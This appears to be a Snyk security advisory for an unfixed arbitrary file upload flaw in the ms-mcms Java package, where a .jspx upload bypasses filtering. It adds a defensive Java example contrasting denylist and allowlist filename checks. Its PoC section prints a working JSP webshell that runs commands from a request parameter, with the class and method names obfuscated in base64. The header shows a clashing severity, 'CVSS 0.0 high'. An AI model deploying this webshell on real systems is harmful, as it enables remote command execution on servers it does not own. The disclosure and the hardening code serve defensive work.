Arbitrary File Upload Affecting net.mingsoft:ms-mcms package, versions [0,]


Snyk CVSS: 0.0 high
  • Attack Complexity: Low
  • Integrity: High

Threat Intelligence
  • Exploit Maturity: Proof of concept
  • EPSS: 0.3% (70th percentile)

NVD: 9.8 critical

  • Snyk ID SNYK-JAVA-NETMINGSOFT-2407592
  • published 20 Feb 2022
  • disclosed 20 Feb 2022
  • credit Harry Smith

How to fix?

There is no fixed version for net.mingsoft:ms-mcms.

Overview

Affected versions of this package are vulnerable to Arbitrary File Upload via the /file/upload endpoint. Uploading a file with the .jspx extension bypasses the upload filtering in place, which lets an attacker obtain a webshell.
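The following hypothetical Java checks are added here as an illustration (not ms-mcms code; the package's actual filter is not shown on this page). They contrast a denylist that blocks .jsp but lets .jspx through with an allowlist that accepts only the types the upload feature needs, and a server-chosen storage name so the client-supplied name never reaches disk:

```java
import java.util.Locale;
import java.util.Set;
import java.util.UUID;

// Hypothetical upload-name checks (illustration only, not ms-mcms code).
public final class UploadNameCheck {

    // Denylist: blocks the obvious names only. Tomcat also executes .jspx (XML-syntax JSP).
    private static final Set<String> BLOCKED = Set.of("jsp", "php", "exe");

    // Allowlist: only what the upload feature is actually for (assumed set).
    private static final Set<String> ALLOWED = Set.of("png", "jpg", "jpeg", "gif", "pdf");

    /** Lower-cased final extension of the base name, or "" if there is none. */
    static String extension(String fileName) {
        int slash = Math.max(fileName.lastIndexOf('/'), fileName.lastIndexOf('\\'));
        String base = fileName.substring(slash + 1);
        int dot = base.lastIndexOf('.');
        if (dot < 0 || dot == base.length() - 1) {
            return "";   // no extension, or a trailing dot
        }
        return base.substring(dot + 1).toLowerCase(Locale.ROOT);
    }

    /** Vulnerable pattern: anything not explicitly blocked is accepted. */
    public static boolean denylistAccepts(String fileName) {
        return !BLOCKED.contains(extension(fileName));
    }

    /** Hardened pattern: only known-safe extensions are accepted. */
    public static boolean allowlistAccepts(String fileName) {
        return ALLOWED.contains(extension(fileName));
    }

    /** Server-chosen storage name: the client-supplied name is never written to disk. */
    public static String storageName(String fileName) {
        if (!allowlistAccepts(fileName)) {
            throw new IllegalArgumentException("rejected upload: " + fileName);
        }
        return UUID.randomUUID() + "." + extension(fileName);
    }

    public static void main(String[] args) {
        // Constructed sample names: a normal image, the blocked case, and two bypass attempts.
        for (String name : new String[] {"avatar.png", "shell.jsp", "shell.jspx", "x.jspx."}) {
            System.out.printf("%-11s denylist=%-5b allowlist=%b%n",
                    name, denylistAccepts(name), allowlistAccepts(name));
        }
    }
}
```

Running the main method shows the denylist accepting shell.jspx and x.jspx. while the allowlist rejects both; the same check must also run on the server, since any client-side filter can be skipped.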

## PoC

```jsp
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
if(request.getParameter("cmd")!=null){
    BASE64Decoder decoder = new BASE64Decoder();
    Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
    Process e = (Process)
            rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
                    String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
                    Object[]{}), request.getParameter("cmd") );
    java.io.InputStream in = e.getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
}
%>
```

References